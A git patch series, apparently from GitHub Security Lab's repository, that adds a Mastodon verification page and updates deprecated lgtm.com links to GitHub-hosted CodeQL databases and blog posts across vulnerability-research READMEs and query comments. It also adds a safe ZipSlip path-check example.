From 506c77af47c5ded40833ee4582aee670005656b1 Mon Sep 17 00:00:00 2001
From: Bas Alberts <13686387+anticomputer@users.noreply.github.com>
Date: Mon, 7 Nov 2022 16:51:41 -0500
Subject: [PATCH 01/53] Create verifications.html
Mastodon account verifications to serve out of raw.
---
mastodon/verifications.html | 4 ++++
1 file changed, 4 insertions(+)
create mode 100644 mastodon/verifications.html
diff --git a/mastodon/verifications.html b/mastodon/verifications.html
new file mode 100644
index 0000000..0bddc0e
--- /dev/null
+++ b/mastodon/verifications.html
@@ -0,0 +1,4 @@
+
+ GitHub Security on Mastodon
+ GitHub Security Lab on Mastodon
+
From d1cca5ac93804174a87f8d0c4ad718fd6b2a855f Mon Sep 17 00:00:00 2001
From: Joseph Katsioloudes
Date: Tue, 29 Nov 2022 22:42:13 +0000
Subject: [PATCH 02/53] replaces databases, blog URLs and removes lgtm
---
.../ChakraCore-bad-overflow-check/README.md | 4 +--
.../cpp/Facebook_Fizz_CVE-2019-3560/README.md | 2 +-
.../cpp/Qualcomm-MSM-copy_from_user/README.md | 4 +--
.../cpp/XNU_DTrace_CVE-2017-13782/README.md | 4 +--
.../README.md | 4 +--
.../00_mbuf_copydata_tainted_size.ql | 2 +-
.../XNU_icmp_error_CVE-2018-4407/README.md | 4 +--
.../README.md | 6 ++--
.../cpp/libjpeg-turbo-oob/README.md | 4 +--
.../cpp/libssh2_eating_error_codes/README.md | 4 +--
.../cpp/rsyslog_CVE-2018-1000140/README.md | 6 ++--
.../Video/rsyslog.srt | 2 +-
CodeQL_Queries/csharp/ZipSlip/README.md | 33 ++++++++++++++-----
.../Apache_Struts_CVE-2017-9805/README.md | 4 +--
.../Apache_Struts_CVE-2018-11776/README.md | 4 +--
.../06_DataFlow_With_Sanitizer.ql | 5 +--
.../Etherpad_CVE-2018-6835/README.md | 6 ++--
.../alternative/README.md | 8 ++---
.../DTrace/CVE-2017-13782/README.md | 2 +-
.../CVE-2017-13782/cve-2017-13782-poc.c | 2 +-
.../icmp_error_CVE-2018-4407/README.md | 2 +-
.../nfs_vfsops_CVE-2018-4259/README.md | 2 +-
.../packet_mangler_CVE-2017-13904/README.md | 2 +-
.../README.md | 2 +-
24 files changed, 65 insertions(+), 53 deletions(-)
diff --git a/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md b/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md
index 8097be5..75f634d 100644
--- a/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md
+++ b/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md
@@ -1,3 +1 @@
-Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/microsoft/chakracore/ChakraCore-revision-2017-April-12--18-13-26.zip)
-
-We now also have this query in our default suite: https://lgtm.com/rules/2156560627/
+Use [this snapshot](https://github.com/github/securitylab/releases/download/chakracore-codeql-database/ChakraCore-revision-2017-April-12--18-13-26.zip)
diff --git a/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md b/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md
index e08808d..6790efd 100644
--- a/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md
+++ b/CodeQL_Queries/cpp/Facebook_Fizz_CVE-2019-3560/README.md
@@ -1,5 +1,5 @@
# Facebook Fizz integer overflow vulnerability (CVE-2019-3560)
-Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/facebook/fizz/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo.
+Use [this snapshot](https://github.com/github/securitylab/releases/download/facebook-codeql-database/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo.
[Fizz](https://github.com/facebookincubator/fizz) contained a remotely triggerable infinite loop. For more details about the bug, see this [blog post](https://securitylab.github.com/research/facebook-fizz-CVE-2019-3560). A proof-of-concept exploit is available [here](https://github.com/github/securitylab/tree/95c0bcc670f3b3d98a4d578f8993f8138092b94f/SecurityExploits/Facebook/Fizz/CVE-2019-3560).
diff --git a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md
index 545706d..9955967 100644
--- a/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md
+++ b/CodeQL_Queries/cpp/Qualcomm-MSM-copy_from_user/README.md
@@ -1,5 +1,5 @@
-[Blog post](https://lgtm.com/blog/qualcomm_copy_from_user)
+[Blog post](https://github.blog/category/security/stack-buffer-overflow-qualcomm-msm/)
-[Snapshot for this demo](https://downloads.lgtm.com/snapshots/cpp/qualcomm/msm/msm-4.4-revision-2017-May-07--08-33-56.zip)
+[Snapshot for this demo](https://github.com/github/securitylab/releases/download/qualcomm-msm-codeql-database/msm-4.4-revision-2017-May-07--08-33-56.zip)
The blog post was written before we had the C++ dataflow library, so these demo queries are a bit different than the blog post.
diff --git a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md
index b9f2ed7..fe8c552 100644
--- a/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md
+++ b/CodeQL_Queries/cpp/XNU_DTrace_CVE-2017-13782/README.md
@@ -1,5 +1,5 @@
-[Blog post](https://lgtm.com/blog/apple_xnu_dtrace_CVE-2017-13782)
+[Blog post](https://github.blog/category/security/apple-xnu-dtrace-CVE-2017-13782/)
Bug was fixed in [macOS High Sierra 10.13.1](https://support.apple.com/en-us/HT208221).
-[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug.
+[This snapshot](https://github.com/github/securitylab/releases/download/xnu-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug.
diff --git a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md
index 7ca34fd..c0151de 100644
--- a/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md
+++ b/CodeQL_Queries/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md
@@ -1,5 +1,5 @@
-[Blog post](https://lgtm.com/blog/apple_xnu_nfs_boot_CVE-2018-4136_CVE-2018-4160)
+[Blog post](https://github.blog/category/security/apple-xnu-nfs-boot/)
Bug was fixed in [macOS High Sierra 10.13.4](https://support.apple.com/en-gb/HT208692).
-[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug.
+[This snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug.
diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql
index b34679d..29ecd05 100644
--- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql
+++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/00_mbuf_copydata_tainted_size.ql
@@ -10,7 +10,7 @@
/*
* This query is explained in detail in this blog post:
*
- * https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
+ * https://github.blog/category/security/apple-xnu-icmp-error-CVE-2018-4407/
*
* It is based on the assumption that the function `m_mtod`, which returns
* a pointer to the data stored in an `mbuf`, often returns a buffer
diff --git a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md
index cae2e9c..9ec2dfe 100644
--- a/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md
+++ b/CodeQL_Queries/cpp/XNU_icmp_error_CVE-2018-4407/README.md
@@ -1,5 +1,5 @@
# Apple XNU icmp_error CVE-2018-4407
-Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo.
+Use [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13.6-codeql-database/xnu-4570.71.2_macOS-10.13.6_Semmle-1.18.0.zip) for the demo.
-There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://lgtm.com/blog/apple_xnu_icmp_nfs_pocs), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`.
+There are two parts to this demo. The first part is `00_mbuf_copydata_tainted_size.ql`, which is the dataflow query that found the bug. It is explained in detail in [this blog post](https://github.blog/category/security/apple-xnu-icmp-error-CVE-2018-4407/). The problem with this query is that it does not find the true source of the untrusted data. This is because it assumes that any call to the function named `m_mtod` can return untrusted data. But not every `mbuf` contains untrusted data. So the second part of the demo, corresponding to [this blog post](https://github.blog/category/security/apple-xnu-exploit-icmp-poc/), is to use dataflow analysis to find a path that gets an untrusted `mbuf` into `icmp_error`. The second part of the demo is developed in steps, starting with `01_paths_to_icmp_error.ql`.
diff --git a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md
index 58bc6be..b0039e9 100644
--- a/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md
+++ b/CodeQL_Queries/cpp/XNU_packet-mangler_CVE-2018-4249/README.md
@@ -1,4 +1,4 @@
-https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904
+https://github.blog/category/security/CVE-2018-4249-apple-xnu-packet-mangler/
There were multiple bugs in `packet_mangler.c`. One of the infinite loop bugs was fixed in macOS High Sierra 10.13.2. The other bugs were fixed in macOS High Sierra 10.13.5.
@@ -8,6 +8,6 @@ For a demo, the best query to show is `tcphdr_mbuf_copydata.ql`, because it show
`InfiniteLoop.ql` is a query inspired by one of the bugs in this code: the loop might not terminate because the loop counter is updated with a compound assignment (`+=`). We wrote an exploit which causes the right hand side of the assignment to be zero, which means that the loop runs forever.
-All three queries find results in [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13).
+All three queries find results in [this snapshot](https://github.com/github/securitylab/releases/download/xnu-macos10.13-codeql-database/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13).
-The queries also find results in [this newer snapshot for 10.13.3](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong.
+The queries also find results in [this newer snapshot for 10.13.3](https://github.com/github/securitylab/releases/download/xnu-macos10.13.3-codeql-database/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong.
diff --git a/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md b/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md
index 8e08a09..6605aa1 100644
--- a/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md
+++ b/CodeQL_Queries/cpp/libjpeg-turbo-oob/README.md
@@ -2,7 +2,7 @@ This is demo is an example of variant analysis on a recent [bugfix](https://gith
The fix prevents an out-of-bounds access when processing malformed BMP files: when reading a BMP file, the library allocates a colour map based on the number of colours declared in the BMP header. Later on, individual bytes are read from the file and used as indices into this colour map. Previously, this was done without checking whether the byte actually represented a valid colour, which could cause an out-of-bounds access. The fix introduces a field in the same struct as the colour map that records its size, and checks the index against it, aborting with an error if the index is out of range.
-A snapshot of libjpeg-turbo from before the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-0fa7850aeb273204acd57be11f328b2be5d97dc6.zip), and one that contains the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d5f281b734425fc1d930ff2c3f8441aad731343e.zip).
+A snapshot of libjpeg-turbo from before the fix is [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database/libjpeg-turbo-revision-0fa7850aeb273204acd57be11f328b2be5d97dc6.zip), and one that contains the fix is [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database-patched/libjpeg-turbo-revision-d5f281b734425fc1d930ff2c3f8441aad731343e.zip).
The first five QL files develop a query that flags exactly the fixed accesses on the former snapshot, and nothing on the latter; the last query is a generalisation that finds a new instance of the same problem. All queries are run on the fixed snapshot, except when stated otherwise.
@@ -11,6 +11,6 @@ The first five QL files develop a query that flags exactly the fixed accesses on
- 02b_find_guarded_colormap_index_working.ql: The previous query doesn't actually work, since `ERREXIT` isn't recognised as being a non-returning macro. This query fixes that.
- 03_find_unguarded_colormap_index.ql: Flipping the logic around, we now look for _unguarded_ indexing. This gives a few false positives in cases where `cmap_length` isn't used. There is still a guard in these cases, but it's against a parameter that happens to contain the size of the colour map.
- 04_find_unguarded_colormap_no_fps.ql: Add inter-procedural tracking to reason about the flow of colour maps and their sizes. This eliminates the remaining FPs on the fixed snapshot, and gives the expected results on the original snapshot.
- - 05_find_unguarded_colormap_generalised.ql: By removing the hardcoded references to `_bmp_source_struct`, we get a more general query that looks for other unguarded indexes into colour maps. This gives yet more false positives, since there are a few other guarding patterns, but the first three results are actually true positives, which we [reported](https://github.com/libjpeg-turbo/libjpeg-turbo/issues/295). A snapshot with these results fixed is available [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d00d7d8c194e587ed10a395e0f307ce9dddf5687.zip).
+ - 05_find_unguarded_colormap_generalised.ql: By removing the hardcoded references to `_bmp_source_struct`, we get a more general query that looks for other unguarded indexes into colour maps. This gives yet more false positives, since there are a few other guarding patterns, but the first three results are actually true positives, which we [reported](https://github.com/libjpeg-turbo/libjpeg-turbo/issues/295). A snapshot with these results fixed is available [here](https://github.com/github/securitylab/releases/download/lipjpeg-turbo-codeql-database-patched/libjpeg-turbo-revision-d00d7d8c194e587ed10a395e0f307ce9dddf5687.zip).
Note that the final query is somewhat non-trivial (>100 LoC, uses global value numbering, guards and inter-procedural flow), so it's perhaps best used with an audience that has seen some simple QL before.
diff --git a/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md b/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md
index 2c2a630..4b595a5 100644
--- a/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md
+++ b/CodeQL_Queries/cpp/libssh2_eating_error_codes/README.md
@@ -1,9 +1,9 @@
# Eating error codes in libssh2
-Download this [snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo.
+Download this [snapshot](https://github.com/github/securitylab/releases/download/libssh2-codeql-database/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo.
This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug that we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released.
-[This](https://lgtm.com/projects/g/libssh2/libssh2/snapshot/6e2f5563c80521b3cde72a6fcdb675c2e085f9cf/files/src/hostkey.c?sort=name&dir=ASC&mode=heatmap&__hstc=70225743.5fa8704c8874c6eafaef219923a26734.1534954774206.1564532078978.1564925733575.72&__hssc=70225743.2.1565139962633&__hsfp=997709570#L677) is an example of the bug. The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored.
+The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored.
For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local data flow and range analysis.
diff --git a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
index 36c17f5..ee53f5c 100644
--- a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
+++ b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/README.md
@@ -1,5 +1,5 @@
-[Blog post](https://lgtm.com/blog/rsyslog_snprintf_CVE-2018-1000140).
+[Blog post](https://github.blog/category/security/librelp-buffer-overflow-cve-2018-1000140/).
-This bug was found by one of our [default queries](https://lgtm.com/rules/1505913226124/). However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query.
+This bug was found by one of [CodeQL](https://codeql.github.com/) default queries. However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query.
-Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/rsyslog/rsyslog/rsyslog-all-revision-2018-April-27--14-12-31.zip).
+Use [this snapshot](https://github.com/github/securitylab/releases/download/rsyslog-codeql-database/rsyslog-all-revision-2018-April-27--14-12-31.zip).
diff --git a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt
index f18de68..bf1f72b 100644
--- a/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt
+++ b/CodeQL_Queries/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt
@@ -1168,7 +1168,7 @@ which is now included
285
00:16:24,478 --> 00:16:28,858
-in our default suite on lgtm.com.
+in our default suite on lgtm.com (NOW DEPRECATED).
286
00:16:29,340 --> 00:16:32,231
diff --git a/CodeQL_Queries/csharp/ZipSlip/README.md b/CodeQL_Queries/csharp/ZipSlip/README.md
index 03822bb..3d5209d 100644
--- a/CodeQL_Queries/csharp/ZipSlip/README.md
+++ b/CodeQL_Queries/csharp/ZipSlip/README.md
@@ -2,7 +2,7 @@
## Snapshot
-Use [this snapshot](http://downloads.lgtm.com/snapshots/csharp/microsoft/powershell/PowerShell_PowerShell_csharp-srcVersion_450d884668ca477c6581ce597958f021fac30bff-dist_odasa-lgtm-2018-09-11-e5cbe16-linux64.zip)
+Use [this snapshot](https://github.com/github/securitylab/releases/download/powershell-codeql-database/PowerShell_PowerShell_csharp-srcVersion_450d884668ca477c6581ce597958f021fac30bff-dist_odasa-lgtm-2018-09-11-e5cbe16-linux64.zip)
of PowerShell.
## Introduction
@@ -15,14 +15,12 @@ they had written a basic query and run it against a number of critical codebases
Because Semmle has a close working relationship with Microsoft, we then helped Microsoft to refine
that query further and submit it as a [pull request](https://github.com/Semmle/ql/pull/54) against our open source QL repository.
-It was deployed to [LGTM.com](https://lgtm.com) within 2 weeks where it was run over thousands of open source C# projects.
+It was deployed to the now deprecated LGTM website within 2 weeks where it was run over thousands of open source C# projects.
-Here are some [sample results](https://lgtm.com/rules/1506511188430/alerts/) for the ZipSlip query.
-One of those projects was Microsoft PowerShell.
+The CodeQL ZipSlip query found a vulnerability in Microsoft PowerShell.
As a result of this query, [a senior Microsoft engineer](https://github.com/TravisEz13)
-fixed this vulnerability in November 2018 in
-[this PR](https://lgtm.com/projects/g/PowerShell/PowerShell/rev/b39a41109d86d9ba75f966e2d7b52b81fa629150).
+fixed this vulnerability in November 2018.
So how did they do it?
@@ -48,5 +46,24 @@ This uses a global taint tracking configuration.
# Final query
-The [final query](https://lgtm.com/rules/1506511188430/) includes query help, and identifies various other sources and sinks,
-but uses the same general structure. It also includes metadata for LGTM.
+The final query below includes query help, and identifies various other sources and sinks,
+but uses the same general structure.
+
+```ql
+using System.IO;
+using System.IO.Compression;
+class Good
+{
+ public static void WriteToDirectory(ZipArchiveEntry entry,
+ string destDirectory)
+ {
+ string destFileName = Path.GetFullPath(Path.Combine(destDirectory, entry.FullName));
+ string fullDestDirPath = Path.GetFullPath(destDirectory + Path.DirectorySeparatorChar);
+ if (!destFileName.StartsWith(fullDestDirPath)) {
+ throw new System.InvalidOperationException("Entry is outside the target dir: " +
+ destFileName);
+ }
+ entry.ExtractToFile(destFileName);
+ }
+}
+```
diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
index 99db29e..5b32d6c 100644
--- a/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
+++ b/CodeQL_Queries/java/Apache_Struts_CVE-2017-9805/README.md
@@ -1,6 +1,6 @@
-[Blog post](https://lgtm.com/blog/apache_struts_CVE-2017-9805)
+[Blog post](https://github.blog/category/security/apache-struts-vulnerability-cve-2017-9805/)
-[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-91ae344-CVE-2017-9805.zip) has the bug. Also, Mo has greated a copy of the project so that you can see [the result](https://lgtm.com/projects/g/mmosemmle/struts_9805/alerts/?mode=list&id=java%2Funsafe-deserialization) on [lgtm.com](https://lgtm.com/projects/g/mmosemmle/struts_9805).
+[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-codeql-database/apache-struts-91ae344-CVE-2017-9805.zip) has the bug.
This directory contains a copy of `UnsafeDeserialization.qll`, because I get a syntax error when I try to do `import Security.CWE.CWE-502.UnsafeDeserialization`.
diff --git a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
index eb5e7bd..bd6e664 100644
--- a/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
+++ b/CodeQL_Queries/java/Apache_Struts_CVE-2018-11776/README.md
@@ -1,8 +1,8 @@
# Apache Struts CVE-2018-11776
-[Blog post](https://lgtm.com/blog/apache_struts_CVE-2018-11776)
+[Blog post](https://github.blog/category/security/apache-struts-CVE-2018-11776/)
-[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug.
+[This snapshot](https://github.com/github/securitylab/releases/download/apache-struts-CVE-2018-11776-codeql-database/apache-struts-7fd1622-CVE-2018-11776.zip) has the bug.
The queries in this directory are slightly simplified to make the demo easier to follow. As a result, they don't find as many variants as the query described in the blog post. The full query can be found [here](https://github.com/Semmle/SecurityQueries/blob/e5c2be7d5eec46cd5a4a8ebdbe8cb63be2e36665/semmle-security-java/queries/struts/cve_2018_11776/final.ql).
diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql
index 55e2e08..9bc5cf4 100644
--- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql
+++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/06_DataFlow_With_Sanitizer.ql
@@ -89,10 +89,7 @@ class IsVarNameSanitizer extends TaintTracking::AdditionalSanitizerGuardNode, Da
}
}
-// The vulnerability was fixed on 2018-03-23 by adding a call to isValidJSONPName:
-//
-// https://lgtm.com/projects/g/ether/etherpad-lite/rev/dd7894d3c9389a000d11d3a89962d9fcc9c6c44b
-//
+// The vulnerability was fixed on 2018-03-23 by adding a call to isValidJSONPName.
// This version of the query adds a sanitizer to exclude those results.
from Configuration xss, DataFlow::PathNode source, DataFlow::PathNode sink
where xss.hasFlowPath(source, sink)
diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md
index 95a12a7..ca4dff7 100644
--- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md
+++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/README.md
@@ -1,5 +1,5 @@
-[Blog post](https://lgtm.com/blog/etherpad_CVE-2018-6835)
+[Blog post](https://github.blog/category/security/etherpad-reflected-file-download/)
-[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) has the vulnerability.
+[This snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) has the vulnerability.
-For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip).
+For the final query, which shows how to detect the sanitization function after the bug was fixed, use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-patched-codeql-database/Etherpad_42e0646327527ff0db7bcbd93fb9d16ff738905b.zip).
diff --git a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md
index 96ee549..fe520f4 100644
--- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md
+++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md
@@ -1,8 +1,8 @@
This is an alternative presentation of the query from the blog post about
-[Detecting Reflected File Download vulnerabilities using QL](https://lgtm.com/blog/etherpad_CVE-2018-6835),
+[Detecting Reflected File Download vulnerabilities using QL](https://github.blog/category/security/etherpad-reflected-file-download/),
phrasing it as a customization of Semmle's standard Reflected XSS query.
-Use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2)
+Use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2)
for the initial stages of the development. All snapshots were built using version 1.9.3 of the Semmle toolchain; if you are using
1.20 or newer you will need to upgrade them.
@@ -24,13 +24,13 @@ for the initial stages of the development. All snapshots were built using versio
The developers [fixed](https://github.com/ether/etherpad-lite/commit/a2992b3) the vulnerability by introducing a sanitizer using the
[is-var-name](https://www.npmjs.com/package/is-var-name) npm package.
-[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_a2992b3.zip) corresponds to the fix commit.
+[This snapshot](https://github.com/github/securitylab/releases/tag/etherpad-patched-codeql-database) corresponds to the fix commit.
The standard library does not include a model for `is-var-name` (it is not a very widely used package), but
[07_ReflectedXssWithSanitizer.ql](07_ReflectedXssWithSanitizer.ql) shows that it is very easy to add, making
the result go away.
Later on, this sanitizer was [replaced](https://github.com/ether/etherpad-lite/commit/dd7894d) with a custom sanitizer, which is,
-unfortunately, ineffective. ([This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.4.zip)
+unfortunately, ineffective. ([This snapshot](https://github.com/github/securitylab/releases/download/etherpad-1.6.4-patched-codeql-database/Etherpad_1.6.4.zip)
of etherpad-lite v1.6.4 contains the new sanitizer.) However, all browsers mitigate against reflected file download
vulnerabilities these days, so while the vulnerability still exists, it is no longer exploitable.
diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md
index 109c6cf..da1c15b 100644
--- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md
+++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md
@@ -1,4 +1,4 @@
-For more information about this exploit PoC, see the [blog post](https://lgtm.com/blog/apple_xnu_dtrace_CVE-2017-13782).
+For more information about this exploit PoC, see the [blog post](https://github.blog/category/security/apple-xnu-dtrace-CVE-2017-13782/).
This exploit PoC is designed for macOS High Sierra version 10.13. Apple released a patch on [Oct 31, 2017](https://support.apple.com/en-us/HT208221).
diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c
index 9b03e1c..10802c0 100644
--- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c
+++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c
@@ -2,7 +2,7 @@
* Copyright Kevin Backhouse / Semmle Ltd (2017)
* License: Apache License 2.0
*
- * For more information: https://lgtm.com/blog/apple_xnu_dtrace_cve-2017-13782
+ * For more information: https://github.blog/category/security/
*/
#include
#include
diff --git a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md
index 1dfd364..5515cce 100644
--- a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md
+++ b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md
@@ -2,7 +2,7 @@
